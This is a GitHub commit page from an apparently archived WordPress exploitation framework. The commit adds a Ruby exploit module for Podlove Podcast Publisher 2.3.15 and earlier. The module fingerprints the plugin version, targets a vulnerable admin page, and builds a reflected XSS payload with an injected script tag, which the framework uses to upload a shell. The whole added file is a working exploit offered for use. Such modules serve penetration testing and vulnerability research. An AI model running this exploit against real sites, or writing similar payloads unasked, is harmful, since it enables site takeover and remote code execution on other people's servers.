Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 1f0fbf0

Browse files
committed
Add Podlove Podcast Publisher <= 2.3.15 reflected XSS shell upload
1 parent 05974ae commit 1f0fbf0

File tree

1 file changed

+34
-0
lines changed

1 file changed

+34
-0
lines changed
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
class Wpxf::Exploit::PodlovePodcastPublisherReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Podlove Podcast Publisher <= 2.3.15 Reflected XSS Shell Upload',
9+
author: [
10+
'Rob Carr <rob[at]rastating.com>' # WPXF module
11+
],
12+
references: [
13+
['WPVDB', '8697'],
14+
['URL', 'https://www.rastating.com/podlove-podcast-publisher-2-3-15-reflected-xss']
15+
],
16+
date: 'Dec 14 2016'
17+
)
18+
end
19+
20+
def check
21+
check_plugin_version_from_changelog('podlove-podcasting-plugin-for-wordpress', 'readme.txt', '2.3.16')
22+
end
23+
24+
def vulnerable_url
25+
normalize_uri(wordpress_url_admin, 'admin.php?page=podlove_episode_assets_settings_handle')
26+
end
27+
28+
def initial_script
29+
create_basic_post_script(
30+
vulnerable_url,
31+
'page' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><a href=\\\""
32+
)
33+
end
34+
end

0 commit comments

Comments
 (0)